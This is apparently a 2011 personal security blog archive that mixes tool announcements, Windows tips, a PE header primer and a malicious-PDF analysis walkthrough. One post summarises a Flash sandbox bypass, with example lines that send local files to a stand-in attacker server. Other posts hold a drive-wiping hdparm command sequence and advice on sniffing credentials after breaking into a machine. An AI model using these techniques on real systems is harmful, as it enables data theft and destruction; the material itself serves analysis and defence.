Robots and Humans

2011-05-09T13:49:00.023+08:00

Other robots.txt, Google site does show some humor where they do have human beside having the robots. Here's the list of URL and the snippets:

Google Robots:

Sitemap: http://www.gstatic.com/s2/sitemaps/profiles-sitemap.xml
Sitemap: http://www.google.com/hostednews/sitemap_index.xml
Sitemap: http://www.google.com/ventures/sitemap_ventures.xml
Sitemap: http://www.google.com/sitemaps_webmasters.xml
Sitemap: http://www.gstatic.com/trends/websites/sitemaps/sitemapindex.xml
Sitemap: http://www.gstatic.com/dictionary/static/sitemaps/sitemap_index.xml

Youtube Robots:

# robots.txt file for YouTube# Created in the distant future (the year 2000) after# the robotic uprising of the mid 90's which wiped out all humans.

Google humans:

Google is built by a large team of engineers, designers, researchers, robots, and others in many different sites across the globe. It is updated continuously, and built with more tools and technologies than we can shake a stick at. If you'd like to help us out, see google.com/jobs.

Monthly Report [ infosec ]

2011-05-08T15:37:00.001+08:00

"This is the monthly incident report.", said Security Administrator.

"Put together with last month report, and I'll review it next month." said IT director.

"The Worst Information Security Advice Ever"

2011-05-07T12:51:00.000+08:00

Get inspired from Lenny's post on "The Worst Information Security Advice Ever", I put a few here:

"We can save the money on firewall, because we will have an excellent IPS deployed next week.", said CIO.
"We hire the consultants to create the policy for us, and we will pay them to audit our PCI compliance status later on. So I know we are safe.", said CISO.
Disable the "change password" capability. This helps users from forgetting their password and save us from having to reset for them.
Limit the event log size to 3MB in order to avoid the hard disk full.
We're just too big to FAIL.

p/s: All the "advice" above are what I collected (in real life) over many years of working experience. This is not the recommendations they themselves made.

Malware Analyser

2011-05-06T16:57:00.023+08:00

A malware analysis tool, Malware Analyser, now has a new home at http://www.malwareanalyser.com/

It is written in Python, and it is a freeware tool to perform static and dynamic analysis on malware.

Here's a few of the features:

String based analysis: API, DLL, registry, etc.
Showing PE header, symbols.
Code analysis by disassembling
Check for packer.
etc.

It can be downloaded from:

http://www.malwareanalyser.com/home/malware_analyser 3.0.zip

Windows Update Error 80240030

2011-05-05T17:17:00.000+08:00

When you get the Windows Update error code 80240030, then you are most likely having issue with:

Can't update your windows. Windows Update fails.
Can't access your proxy setting in MSIE. IE crashes once you click the "LAN setting".
IE can't access Internet (thru proxy).

I'm having all these issues since I upgrade to IE9. And here I find the solution to fix/repair the 80240030 error for me:

Open command prompt (with Administrator mode).
Type "netsh winhttp reset proxy"
Type "net stop wuauserv"
Type "net start wuauserv"

It does works in Windows 7 (32-bit & 64-bit) too. Enjoy!

MD5 in 64-Bit OS?

2011-05-04T07:41:00.000+08:00

We all familiar with MD5 hashing. But let's see the screenshot below.

MD5 Hashing and File Size

You see, two files with different file sizes are having the same MD5 hash value (8ae6dd9a6d246004da047f704f0cc487). Is it MD5 hash coalition? No, once we use the right tool, md5deep64, we get the right result.

For an explanation of WOW64, see Microsoft documentation on Wow64 and some implementation details.

So, let's make sure you have the right tools for your new 64-bit OS today.

References:

md5deep - http://md5deep.sourceforge.net/
md5sum (win32) - http://www.pc-tools.net/win32/md5sums/

Wophcrack

2011-05-03T18:48:00.000+08:00

Everyone of us heard about ophrack - the awesome time/memory trade-off password cracker. If not, see Ophcrack and Rainbow Table.

Wophcrack is the web interface for Ophcrack password cracking tools.

Wophcrack Search Page

Wophcrack was designed to work on Backtrack 4 R2. It is a quick and dirty PHP based web frontend for Ophcrack.

Read more info here after download Wophcrack here:

http://exploit.co.il/hacking/wophcrack-ophcrack-web-interface/?aid=2194&pid=2041&sa=0

Updating Malware Cookbook DVD Tools

2011-05-03T18:35:00.015+08:00

If you haven't got yourself a copy of Malware Analyst's Cookbook, do it now, then you may download the DVD tools which available online. This is a must-have if you are serious in REM.

I just did it by:

$ cd ~/rem

$ svn checkout http://malwarecookbook.googlecode.com/svn/trunk/ malwarecookbook-read-only

Unity Shortcuts Wallpaper

2011-05-01T15:03:00.001+08:00

Everyone probably know that Unity-powered Ubuntu 11.04 is out. Of course, it comes with new interface, which includes a slew of new keyboard shortcuts.

The Unity interface is pretty big overhaul. So, here's a wallpaper that keeps a list of keyboard shortcuts for you from AskUbuntu.

English version

From http://askubuntu.com/questions/28086/unity-keyboard-mouse-shortcuts/34876#34876

A New Life with Cloud Computing

2011-04-30T15:16:00.000+08:00

Most people know what Cloud Computing is. But, do you know how can someone begin his life with Cloud Computing?

Take an example of Amazon S3 cloud computing services. It stands for Simple Storage Service.

First, we can backup and/or archive all the local files (documents, media, etc) to S3, which available online from everywhere later on. Most of us may currently backup/archive our files using a portable hard disk. Let's see what's the cost of choosing S3 instead of portable hard disk.

S3 operates on a basis of paying only for what you use, with separate fees for storage, data transfer and data requests. Ignoring data request fees because the cost is minimal, the fees break down as follows:

Storage: 5GB free, then $0.15/GB per month (100GB = $15)
Data Transfer (Upload): $0.10/GB
Data Transfer (Download): $0.15/GB

As an example then – if you used it to store 100GB of data – it would cost you $10 to upload it all, $15 per month to store it, and a further $15 when you decided to download it all again.

So do you need to buy a 250GB portable hard disk and carry it everywhere you go?

Secondly, we may want to backup/archive all the online information we had, such as social feeds and online personas.

Again, by using Amazon S3 and Backupify, it simplifies and automates the backup/archive of all these below.

Automatic Backup by Backupify

Most important is, it allows you to search from the backup easily!

And finally, your life will be uncluttered with this cloud computing.

Remote Command Executor

2011-04-29T16:46:00.001+08:00

RemCom is RAT [Remote Administration Tool] that lets you execute processes on remote windows systems, copy files, process there output and stream it back. It allows execution of remote shell commands directly with full interactive console.

It is similar to psexec except it is open source.

Download RCE at http://sourceforge.net/projects/rce/
For more info, refer to http://talhatariq.wordpress.com/2006/04/14/the-open-source-psexec/

Two Visualization Tools for Twitter

2011-04-28T20:29:00.012+08:00

Two visualization tools for Twitter are introduced here: mentionmapp and twiangulate.

Mention Map is a Twitter visualization tool that displays the connections to a Twitter account. The tool is being upgraded but the original version is still available (click on the "classic link" at the bottom of the page.)

Twiangulate is another Twitter visualization tool that enables you to compare two or more Twitter accounts. The end result is a Venn diagram of commonalities as well as a table of the top followers.

MyEmail 404

2011-04-21T13:14:00.003+08:00

Front-end powered by UNIX Apache; Back-end powered by Microsoft.

www.myemail.my

Goto the default web page and all I get is an instruction to cPanel. :-)

MyEmail Default Web Page

RawCap - Network Sniffer for Windows

2011-04-20T12:03:00.001+08:00

RawCap (only 17kB) is a free raw sockets network sniffer for Windows. It requires no external libraries or DLL, just standalone exe.

It can sniff any interface including loopback, WiFi, PPP interfaces.

Personally, I use it for 2 purposes: penetration testing and incident response:

Sniff additional credential after break into remote machine (admin) without Winpcap or NDIS driver.
Sniff loopback interface to detect data leakage via SSL tunnelling proxy.
Sniff WiFi (WPA2) for any suspicious TCP connections.

RawCap is provided for free and can be downloaded from here:

http://www.netresec.com/?page=RawCap

FindDomains

2011-04-18T14:51:00.002+08:00

FindDomains is a multithreaded search engine discovery tool.

It retrieves domain names/web sites which are located on specified ip address/hostname. It can be very useful for penetration testers during reconnaissance domain names/web sites/virtual hosts/virtual IP.

Main highlights:

Uses Bing search engine. Works with first 1000 records.
Multithreaded on crawling and DNS resolution.
Performs DNS resolution for extracted domains to eleminate cached/old records.
Has a console interface.
Works with Mono (under Linux), but running under Windows is more efficient.
Requires .NET framework 3.5

Find it at http://code.google.com/p/finddomains/

Default Router Passwords

2011-04-14T15:23:00.000+08:00

Find or update a default router(and WiFi) password at http://www.routerpasswords.com/

Open Computing Project

2011-04-11T16:02:00.000+08:00

Under an initiative dubbed the Open Compute Project, Facebook released designs for the technology powering its new data center in Prineville, Ore., which Facebook says is 38 percent more efficient and 24 percent cheaper to run thanks to its custom engineering.

Network Forensic Analysis of SSL MITM Attacks

2011-04-05T07:58:00.001+08:00

SSL is not a panacea. If someone performs a man-in-the-middle (MITM) attack on HTTPS traffic (i.e. HTTP over SSL), he would be able to see all encrypted content in clear text format.

There are some legitimate reasons to eavesdrop the HTTPS traffic, such as your employer or your government.

If you suspect your network traffic is been monitor, how would you go about doing forensic analysis of captured network traffic from a suspected MITM attack?

Here's the summary of the articles that shows you how:

Extract the X.509 certificates (with *.cer) from the captured SSL traffic with NetworkMiner.
Inspect the extracted files.
Verify the IP and DNS
Look for any self-signed cert, revoked cert and non-trusted CA signing cert.
Verify MD5 fingerprint of an SSL cert with OpenSSL

$ openssl x509 -inform DER -in mail.google.com.cer -noout -fingerprint -md5
MD5 Fingerprint=52:12:A2:B1:27:E3:BB:CC:E5:F5:AA:BD:A1:A1:E6:F8

More references:

Windows PE Header

2011-03-22T16:31:00.017+08:00

Understanding Windows PE Header is essential to perform Reverse Engineering Malware.

Each executable file has a COFF (Common Object File Format), which is used from the OS loader to run the program. Windows Portable Executable (PE) is one of the COFF available in Windows Operating System, while the Executable Linking File (ELF) is the main Linux COFF.

Microsoft migrated to the PE format with the introduction of the Windows NT 3.1 operating system. PE/COFF headers still include an MS-DOS executable program, which is by default a stub that displays the simple message "This program cannot be run in DOS mode" (or similar). PE also continues to serve the changing Windows platform. Some extensions include the .NET PE format (see below), a 64-bit version called PE32+ (sometimes PE+), and a specification for Windows CE.

MZ are the first 2 bytes you will see in any PE file opened in a hex editor. The DOS header occupies the first 64 bytes of the file - ie the first 4 rows seen in the hexeditor in the picture below. The last DWORD before the DOS stub begins contains 00h 01h 00h 00h, which is the offset where the PE header begins. The DOS stub is the piece of software that runs if the executable is run from DOS environment (for example DOS shell). For retro-compatibility it often executes a printf("This program must be run under Win32");.

The PE header begins with its signature 50h, 45h, 00h, 00h (the letters "PE" followed by two terminating zeroes). If in the Signature field of the PE header, you find an NE signature here rather than a PE, you're working with a 16-bit Windows New Executable file. Likewise, an LE in the signature field would indicate a Windows 3.x virtual device driver (VxD). An LX here would be the mark of a file for OS/2 2.0. FileHeader is the next 20 bytes of the PE file and contains info about the physical layout & properties of the file e.g. number of sections. OptionalHeader is always present and forms the next 224 bytes. It contains info about the logical layout inside the PE file e.g. AddressOfEntryPoint. Its size is given by a member of FileHeader. The structures of these members are also defined in windows.inc.

Not all these section must be used, but you need to modify the NumberOfSections to add or delete sections from a PE file. The best way to analyze those section is by using PEExplorer or PEID.

EntryPoint is The Relative Virtual Addresses (RVA) of the first instruction that will be executed when the PE loader is ready to run the PE file. If you want to divert the flow of execution right from the start, you need to change the value in this field to a new RVA and the instruction at the new RVA will be executed first. Executable packers usually redirect this value to their decompression stub, after which execution jumps back to the original entry point of the app the OEP. Of further note is the Starforce protection in which the CODE section is not present in the file on disk but is written into virtual memory on execution.

ImageBase is the preferred load address for the PE file. For example, if the value in this field is 400000h, the PE loader will try to load the file into the virtual address space starting at 400000h. The word "preferred" means that the PE loader may not load the file at that address if some other module already occupied that address range. In 99% of cases it is 400000h.

SectionAlignment is the granularity of the alignment of the sections in memory. For example, if the value in this field is 4096 (1000h), each section must start at multiples of 4096 bytes. If the first section is at 401000h and its size is 10 bytes, the next section must be at 402000h even if the address space between 401000h and 402000h will be mostly unused.

FileAlignment is the granularity of the alignment of the sections in the file. For example, if the value in this field is 512 (200h), each section must start at multiples of 512 bytes. If the first section is at file offset 200h and the size is 10 bytes, the next section must be located at file offset 400h: the space between file offsets 522 and 1024 is unused/undefined.

SizeOfImage is the overall size of the PE image in memory. It's the sum of all headers and sections aligned to SectionAlignment.

SizeOfHeaders is the size of all headers + section table. In short, this value is equal to the file size minus the combined size of all sections in the file. You can also use this value as the file offset of the first section in the PE file.

DataDirectory It is the final 128 bytes of OptionalHeader, which in turn is the final member of the PE header IMAGE_NT_HEADERS. DataDirectory is an array of 16 IMAGE_DATA_DIRECTORY structures, 8 bytes apiece, each relating to an important data structure in the PE file. Each array refers to a predefined item, such as the import table. The structure has 2 members which contain the location and size of the data structure in question: VirtualAddress is the relative virtual address (RVA) of the data structure , and isize contains the size in bytes of the data structure.

Windows PE Header

References:

http://marcoramilli.blogspot.com/2010/12/windows-pe-header.html
http://www.osdever.net/documents/PECOFF.pdf
http://www.skyfree.org/linux/references/coff.pdf
http://www.woodmann.com/RCE-CD-SITES/Library/M_Pietrek_Book/PietrekBook.pdf

Download YouTube video

2011-03-18T11:29:00.001+08:00

Here's my favorite way to download any YouTube video that I like, such as music video.

Use Google Chrome browser (or FireFox).
Install the userscirpt, "YouTube Video Download", at http://userscripts.org/scripts/show/62634

Now, dig from your bookmark for your favorite YouTube video, and you should see the "Download" button below. Enjoy!

Internet Explorer 9 is coming to town

2011-03-15T14:38:00.001+08:00

Internet Explorer 9 is available for download now. Just wondering why installing a IE9 required me to restart my computer?

This is what I get after I restart my PC.

:-(

Free Computer Forensic Tools

2011-03-07T13:28:00.000+08:00

This is a handy list for forensic and IR work. Any update of the list will be announced on twitter.com/jonathankrause

Currently the list is divided into the following categories:

Disk Tools
Email Analysis
General
File & Data Analysis
Data Analysis Suite
File Viewers
Internet History Analysis
Registry Analysis
Web Application Analysis

The full list can be obtains at http://forensiccontrol.com/fcresources.php

Introduction to Java Examination

2011-03-07T12:35:00.000+08:00

There is an article posted by Corey Harrell, (Almost) Cooked Up Some Java. It introduces the steps he took to examine the java. This article includes:

Understand the Java cache folder.
Examine the IDX file.
Examine the JAR file.
Extract Java source from the JAR file.
Examine the Java source code.

Arduino Tutorial

2011-03-04T17:00:00.000+08:00

OK, I admit this. I'm only manage to complete up to "Lesson 2". But there are all together 7 lessons in this great tutorial at http://www.ladyada.net/learn/arduino/index.html

And there more more other stuffs there for any beginner who wish to learn Arduino or electronics.

Secure Erase

2011-02-23T17:14:00.001+08:00

This summarize the article from Craig Wright. He is a Director with Information Defense in Australia.

In the article, Erasing drives should be quick and easy, he shows us a way to perform secure erase. Also he stated a few FUD on data recovering like:

X-Ray machines and scanners will erase a drive;
SEM or AFM (electron microscopy will do) could be used to recover data;
Government or NSA can read your wiped drives;

The simplest manner to wipe hard disk is using the the firmware Secure Erase command on an ATA, SATA, PATA, etc drives. A full erase using SE takes 30 min to 1 hour to complete. Basically it is quick. It is non-recoverable. It saves all the BS. It removes the need for the FUD that still surrounds us.

Here's the steps to wipe a drive using hdparm utility:

Login as root.
Ensure the drive isn't security frozen (result shows "not frozen"): hdparm -I /dev/sda
Issue command by set user password, Security =Maximum (Master Password = Blank): hdparm --user-master u --security-set-pass Eins /dev/sda
Issue command to confirm the process with the the word "enabled" in the output: hdparm -I /dev/sda
Issue the AT SE command: hdparm --user-master u --security-erase Eins /dev/sda
Issue command to ensure output verification return "not enabled": hdparm -I /dev/sda

References:

http://sourceforge.net/projects/hdparm/
http://cmrr.ucsd.edu/people/Hughes/SecureErase.shtml
https://ata.wiki.kernel.org/index.php/ATA_Secure_Erase

Multiple IP Addresses with Windows OS

2011-02-17T16:14:00.000+08:00

Here's the batch script to help configure multiple IPv4 addresses on a Windows 7 or Windows 2008. Create a batch file like the below:

netsh in ip add address "eth0" 10.0.0.2 255.0.0.0
netsh in ip add address "eth0" 10.0.0.3 255.0.0.0
netsh in ip add address "eth0" 10.0.0.4 255.0.0.0
netsh in ip add address "eth0" 10.0.0.5 255.0.0.0
netsh in ip add address "eth0" 10.0.0.6 255.0.0.0
[...]
netsh in ip add address "eth0" 10.0.0.226 255.0.0.0

Or just do a command like:

for /L %a in (1,1,254) do netsh in ip add address "eth0" 10.0.0.%a 255.255.255.0

Windows Security Event ID

2011-02-12T22:34:00.000+08:00

A very good reference for Windows Security Event ID: http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/Default.aspx

Analyzing Suspicious PDF Files With PDF Stream Dumper

2011-02-12T15:59:00.000+08:00

Analyzing Suspicious PDF Files With PDF Stream Dumper: "
Targeting a vulnerability in Acrobat Reader is one of the more popular ways of compromising systems nowadays. PDF Stream Dumper is a free tool for analyzing suspicious PDF files, and is an excellent complement to the tools and approaches I outlined in the Analyzing Malicious Documents cheat sheet.

For this introductory walk-through, I will use a malicious PDF file that I obtained from Contagio Malware Dump. If you’d like to experiment with this file in an isolated laboratory environment, you’re welcome to download the malicious PDF from my server; the password to the zip file is the word “infected”.

PDF Stream Dumper is a self-contained program that runs on Microsoft Windows and contains a convenient graphical user interface. The tool contains numerous features. I will only touch upon some of them here.

Examining a PDF File for Suspicious Characteristics

After installing PDF Stream Dumper, load the suspicious PDF file into it and start looking around. The tool includes a number of signatures of known PDF exploits. To scan the file, select “Exploits_Scan” from the menu:

In this case, PDFStreamDumper identifies the exploit and specifies where it’s present in the PDF file:

Exploit CVE-2007-5659 - collectEmailInfo - found in stream: 31

You can use the left pane of the tool to navigate through the file’s objects to examine their contents. The tool will decode steams where necessary. For instance, viewing the steam in object 31 shows us embedded JavaScript:

Another way to locate suspicious objects within the PDF file is to use the tool’s “Search For” feature, which can automatically locate JavaScript, Flash objects among other entities:

Examining Malicious JavaScript in the PDF File

When looking at JavaScript embedded in a PDF object, we can click the “JavaScript_UI” button to bring up the interactive JavaScript viewer and interpreter, which is built into PDF Stream Dumper:

Sometimes, the scripts embedded into PDF files are obfuscated. PDF Stream Dumper allows you to run these scripts using the built-in interpreter, which can help you deobfuscate them.

In the example we’re examining now, the script isn’t obfuscated. It seems to contain Unicode-encoded text, which is probably shellcode:

Examining Shellcode Embedded in the PDF File

Shellcode is typically used to store the payload of the exploit—the malicious code that will be executed on the victim’s system. PDF Steam Dumper provides several tools for understanding the capabilities of the shellcode embedded into the file though its “Shellcode_Analysis” menu.

For example, we can select “scSigs” to emulate the execution of the script using the built-in LibEmu engine and look for signatures of the API calls often present in shellcode:

The tool recognizes the signatures of WriteFile and WinExec. This shellcode probably uses these calls to save and execute a malicious windows executable, which it might download from the Internet or which might be embedded into the PDF file itself.

We can get another perspective on the shellcode by running it using the built-in iDefense shellcode logger module “sclog”:

The tool shows us that the shellcode executes the GetFileSize API call. This is often used as part of malicious document files to locate code embedded into the file. Most likely, this shellcode uses GetFileSize to locate the malicious executable embedded into the PDF.

We now are reasonably certain that we’re dealing with a malicious PDF file that exploits the CVE-2007-5659 vulnerability in Acrobat Reader to extract and run a malicious executable embedded in the PDF. We’d need to perform additional steps to extract and examine that executable, but that is outside the scope of this brief note.

If you like analyzing malicious programs, take a look at the Reverse-Engineering Malware course I teach at SANS. If you’re just getting to know malware, you might also like my Combating Malware course.

— Lenny Zeltser

How to hack a Marathon?

2011-02-03T13:19:00.001+08:00

I never try it yet.

I read this article, How to hack a marathon if you aren’t a runner, and found that it is very interesting. The author managed to finish the marathon in 4 hours and 28 minutes without training.

Here's how he hacked it:

Don’t plan on running the whole thing
Take 4 Advil an hour before the race (Not recommended by physicians, but it’s what we did.)
Take a walking break at every mile marker
Eat half a banana whenever you see one
Take two waters at ever water station
Eat no more than 3 Gu energy packs because our stomachs didn’t like them
Take bathroom breaks
Walk every hill
Meet interesting people and use conversation to kill the pain
Put bandaids on your nipples to prevent bleeding

How much time it takes to download a 2GB MKV file?

2011-02-02T13:06:00.000+08:00

We all like to download MKV (or other format) movie files. Here's a smart hack on calculating the time it takes to download a 2GB MKV file.

The download speed depends on the ADSL line speed you subscribe. For example:

Your file is 2GB size.
Your link speed is 2Mbps.
You are estimating 80% link speed, to account for the network overhead.

So, goto Google search and type this:

2GB / ( 2Mbps * 0.8)

The result shows it is estimating 2.85 hours to complete the download.

See other examples at http://stuffphilwrites.com/2011/01/long-image/

10 Advanced GMail Search Examples

2011-02-01T12:54:00.019+08:00

1. Example: in:inbox label:facebook is:unread

(Search for all unread emails labeled facebook inside inbox.)

2. Example: in:anywhere from:peter

(Search for all emails regardless where it’s stored (spam, inbox, trash) received from anyone with the name Peter.)

3. Example: is:unread after:2010/06/01 before:2010/07/01

(Search for all unread mails for the month of June. )

4. Example: from: peter@emailadress.com has:attachment

(Return all emails with attachments sent by peter@emailadress.com)

5. Example: in:inbox "meeting"

(Search inbox for any emails with the keyword "meeting" in it.)

6. Example: from:peter@emailaddress.com has:attachment filename:zip

(Return only emails received from peter@emailaddress.com with .zip attachments.)

7. Example: "facebook" -from:@facebookmail.com

(Return all emails with the keyword "facebook", excluding those sent by facebook.com)

8. Example: to:peter OR cc:peter

(Return all emails sent to or carbon copied Peter.)

9. Example: label:google OR from:@google.com

(Return all emails received from google.com or labeled "google".)

10. Example: "meeting" is:chat

(Return all chat log files with keyword "meeting" in it.)

Read more: Gmail Advanced Search - Ultimate Guide http://www.hongkiat.com/blog/gmail-advanced-search-ultimate-guide/

Three Web Attack Vectors Using the Browser

2011-01-26T15:05:00.001+08:00

Very interesting article on Three Web Attack Vectors Using the Browser: "

Three web attack vectors seem to be responsible for the majority of computer attacks that involve a web browser:
The attack can incorporate an element of social engineering to persuade the victim to take an action that compromises security. For instance, the victim can supply data to a phishing site or install a program that will turn out to be malicious.

The attacker can use the browser as a gateway for attacking web applications via techniques such as cross-site scripting (XSS), Cross-Site Request Forgery (CSRF) and Clickjacking.

The attacker can exploit a vulnerability in the web browser or in local software that the browser can invoke. Such client-side exploits have targeted browser add-ons such as Flash, Adobe Reader and Java Runtime Environment (JRE).

Most attacks include one or two of the three techniques. For instance, Koobface worm targets the user (social engineering to click links) and the web application (hijacking social networking site sessions). An attack that combines all elements would be particularly effective (do you know of any examples?).

The following series of posts explores these three web browser attack vectors in greater detail, discussing how enterprises can protect themselves against such attacks:
Mitigating Attacks on the User of the Web Browser

Mitigating Attacks on Web Applications Through the Browser

Mitigating Attacks on the Web Browser and Add-Ons

— Lenny Zeltser

Attack Surface Analyzer BETA

2011-01-24T14:43:00.000+08:00

The Attack Surface Analyzer beta is a Microsoft verification tool now available free for everyone to highlight the changes in system state, runtime parameters and securable objects on the Windows operating system. This analysis helps developers, testers and IT professionals identify the attack surface caused by installing applications on a machine.

Attack Surface Analyzer takes a snapshot of your system state before and after the installation of product(s) and displays the changes to a number of key elements of the Windows attack surface. The tool takes snapshots of an organization's system and compares ("diffing") these to identify changes. The tool does not analyze a system based on signatures or known vulnerabilities; instead, it looks for classes of security weaknesses as applications are installed on the Windows operating system.

The tool also gives an overview of the changes to the system Microsoft considers important to the security of the platform and highlights these in the attack surface report. The Microsoft Security Development Lifecycle (SDL) requires development teams to define a given product's default and maximum attack surface during the design phase to reduce the likelihood of exploitation wherever possible. Additional information can be found in the Measuring Relative Attack Surface paper.

Some of the checks performed by the tool include analysis of changed or newly added files, registry keys, services, ActiveX Controls, listening ports, access control lists and other parameters that affect a computer's attack surface.

Download the free tool (x64 and x86) at http://www.microsoft.com/downloads/en/details.aspx?FamilyID=e068c224-9d6d-4bf4-aab8-f7352a5e7d45&displaylang=en

Related article:

SDL Tools

Inguma – The Penetration Testing & Vulnerability Research Toolkit

2011-01-23T15:16:00.000+08:00

Inguma is a penetration testing toolkit entirely written in python. The framework includes modules to discover hosts, gather information about, fuzz targets, brute force user names and passwords and, of course, exploits. This program provides numerous tools for information gathering, target auditing and limited exploitation capabilities.

There are some good docs to get you up at their wiki site: Installation Guide, Getting Started, Console Quick Start, GUI Quick Start, Full Documentation. Follow them at Inguma Development.

Download it at http://code.google.com/p/inguma/

Google Code University

2011-01-22T16:25:00.000+08:00

Learn programming at Google Code University. It does not require registration and materials are free to use.

Switch Between Multiple Gmail Accounts With a URL Hack [URL Hacks]

2011-01-17T10:42:00.000+08:00

Switch Between Multiple Gmail Accounts With a URL Hack [URL Hacks]: "

We were pretty stoked when Google debuted its multiple account sign-in feature, and reader Sam has discovered a way to switch between accounts faster using a small URL tweak.

I was flipping between two Gmail account tabs using Google's multiple logins feature, and I noticed that the two URLs are almost identical: https://mail.google.com/mail/u/0/#inbox and https://mail.google.com/mail/u/1/#inbox. It turns out that switching between the 0 and 1 (and presumably higher numbers if there are more than 2 accounts logged in) switches accounts. In particular, since there is no keyboard shortcut for switching between accounts, editing the URL may be the fastest way to do so using only the keyboard.

In fact, the fastest way to switch between them using only the keyboard would be to bookmark the sites and create address bar keywords for them, so you can flip back and forth using just a few keystrokes instead of having to use your mouse. Thanks, Sam!

REMnux Version 2.0 is released

2011-01-15T21:06:00.001+08:00

REMnux is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software. REMnux version 2 was released few days back.

Download the new version of REMnux from its main page as a virtual appliance and/or as a Live CD. Here're the quick highlight of the tools it supports.

Malicious Websites Analysis:

Updated version of Jsunpack-n (proxy support, encrypted PDF handling)
Includes Stunnel (for interception of SSL sessions)
Includes RABCDAsm toolkit for RE malicious Flash (SWF) programs.
Includes tor and torsocks (for anonymizing interactions with suspicious websites)
Includes Burp Suite Free Edition.

Memory Forensics:

Updated Volatility memory forensics framework to version 1.4 RC 1 (support Vista and 7).
Includes AESKeyFinder and RSAKeyFinder tools (for finding AES and RSA keys in a memory image).

Others:

Includes pyOLEScanner.py (for analysis of malicious Microsoft Office documents).
Includes libemu library to obtain the “sctest” tool (for shellcode analysis).
Added the “whois” utility.
Added xortools.py and pescanner.py tools (from Malware Analyst’s Cookbook).
Installed VBinDiff for viewing and comparing files.
Installed ircII to supplement the Irssi IRC client.
Added the VirusTotal VTzilla Firefox extension.
Added md5deep to assist with hash calculating-operations.
Added ClamAV for manually scanning suspicious files and generating signatures.

Unpatch Microsoft Vulnerabilities

2011-01-13T21:34:00.001+08:00

I saw this this morning on the risk currently being tracked by MSRC at http://blogs.technet.com/b/srd/archive/2011/01/07/assessing-the-risk-of-public-issues-currently-being-tracked-by-the-msrc.aspx

However, there is a longer list of unpatch Microsoft vulnerabilities at VUPEN Security. Any 0day there?

Notmyfault Colors Your BSOD

2011-01-13T15:10:00.000+08:00

Remember Make Simple Things Difficult? There is a new tool from sysinternal to customized the color of BSOD for you easily.

Goto "Blue Screen" in Designers Colors with in One Click.

Replace OpenOffice with LibreOffice

2011-01-13T15:03:00.000+08:00

The development on OpenOffice has been slowing down since the acquisition by Oracle. It is time to look for a replacement.

Today, I found this, called LibreOffice. It is available for Linux (x86 and 64 bit), Mac OS X, and Windows. Most importantly, it supports docx format natively.

Google Chrome to Drop Support for H.264

2011-01-13T10:51:00.001+08:00

Google Chrome to Drop Support for H.264: "Chromium's blog informs that Google Chrome will drop support for H.264 in the coming months and will only support WebM (VP8) and Theora codecs.

We expect even more rapid innovation in the web media platform in the coming year and are focusing our investments in those technologies that are developed and licensed based on open web principles. To that end, we are changing Chrome's HTML5 <video> support to make it consistent with the codecs already supported by the open Chromium project. Specifically, we are supporting the WebM (VP8) and Theora video codecs, and will consider adding support for other high-quality open codecs in the future. Though H.264 plays an important role in video, as our goal is to enable open innovation, support for the codec will be removed and our resources directed towards completely open codec technologies.

Google decided to pick sides, much like Mozilla and Opera, in an effort to encourage developers to use WebM. Right now, the only important website that uses WebM is YouTube, Google's video sharing service. Internet Explorer, Safari and iOS devices are unlikely to support WebM, while hardware acceleration and Flash support are expected later this year.

John Gruber thinks that 'this is just going to push publishers toward forcing Chrome users to use Flash for video playback — and that the video that gets sent to Flash Player will be encoded as H.264'. He also finds it ironic that Google Chrome bundles Adobe's proprietary Flash plugin, which is a great software for playing H.264 videos.

VP8 has a long way to go before becoming the codec of choice for Web videos and Google decided to make it more popular by dropping support for the competing codec from its browser. Last year, Andy Rubin said that sometimes being open 'means not being militant about the things consumer are actually enjoying,' but that's not the case here.

GREM Certificate

2011-01-06T16:33:00.001+08:00

Thanks a lot, I received my GREM certificate from SANS today. ;-)

Bypassing Flash Local-with-filesystem Sandbox

2011-01-06T16:25:00.002+08:00

Background:

Flash is designed around the sandbox concept.
Flash cannot read local files except for the cookie files.

What Billy Rios did recently in his research:

Bypass the restriction and make flash to access any local and remote files.
Found a protocol handler that wasn't blacklisted by Adobe.
User will not be prompted for permission when bypassing attempts.

Summary of how it works:

Using file:// and point to local system. Eg: file://\\192.168.1.1\stolen-data-here\
Then pass the content back to attacker server via getURL(). Eg: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);

References:

Which Linux File System Should You Choose?

2011-01-03T16:39:00.000+08:00

Just finish reading an article explaining about latest Linux file system. It has been quite some time that not follow up with Linux file system. And this article is a good memory refresh for me.

Here are some great points for me (from the article):

Compare to ext2/ext3, ext4 is better for SSD and general performance.
BtrFS makes great for servers due to it's features on performance, snapshot, transparent compression, and online defragmentation.
ReiserFS is great for small files (log), database and email servers.
XFS only works great for large file that requires constant throughput (media files).
JFS works great for both small and large files, with very low CPU usage.
ZFS, an advanced file system that shows great performance in large disk arrays, supports drive pooling, snapshots, and dynamic disk striping.

>>>> http://www.howtogeek.com/howto/33552/htg-explains-which-linux-file-system-should-you-choose/

HTG Explains: Which Linux File System Should You Choose?

File systems are one of the layers beneath your operating system that you don’t think about—unless you’re faced with the plethora of options in Linux. Here’s how to make an educated decision on which file system to use.

The landscape of the Linux file system support is drastically different from Windows and OS X. In Windows and OS X you can find software that will add support for non-standard file systems, but both operating systems can only be installed on their native file system and third party support is added after the fact.

Linux on the other hand has a vast array of supported file systems built into the kernel. But how are you supposed to know which file system to pick when installing? We will take a look at some of the most popular choices available and give you use cases to consider—the choice is ultimately up to you based on your needs.

Image by DijutalTim

What is Journaling?

Before we go to far down the rabbit hole talking about options, we need to first take a quick look at journaling. The only real thing you need to know about journaling is that every modern file system uses journaling in some form or another and on any desktop or laptop you are setting up with Linux you will want to use a journaling file system.

Journaling is only used when writing to a disk and it acts as a sort of punch clock for all writes. This fixes the problem of disk corruption when things are written to the hard drive and then the computer crashes or power is lost. Without a journal the operating system would have no way to know if the file was completely written to disk.

With a journal the file is first written to the journal, punch-in, and then the journal writes the file to disk when ready. Once it has successfully written to the disk, it is removed from the journal, punch-out, and the operation is complete. If power is lost while being written to disk the file system can check the journal for all operations that have not yet been completed and remember where it left off.

The biggest downside to journaling is that it sacrifices some performance in exchange for stability. There is more overhead to write a file to disk but file systems get around this overhead by not writing the full file to the journal. Instead only the file metadata, inode, or disk location is recorded before actually being written to disk.

File System Options

As we look at some of the major file systems available to Linux we are going to touch briefly on each one and give a couple suggestions for when you may or may not want to use the file system based on features. This in no way means these file systems cannot be used in other cases, these suggestions are just areas where each file system will excel.

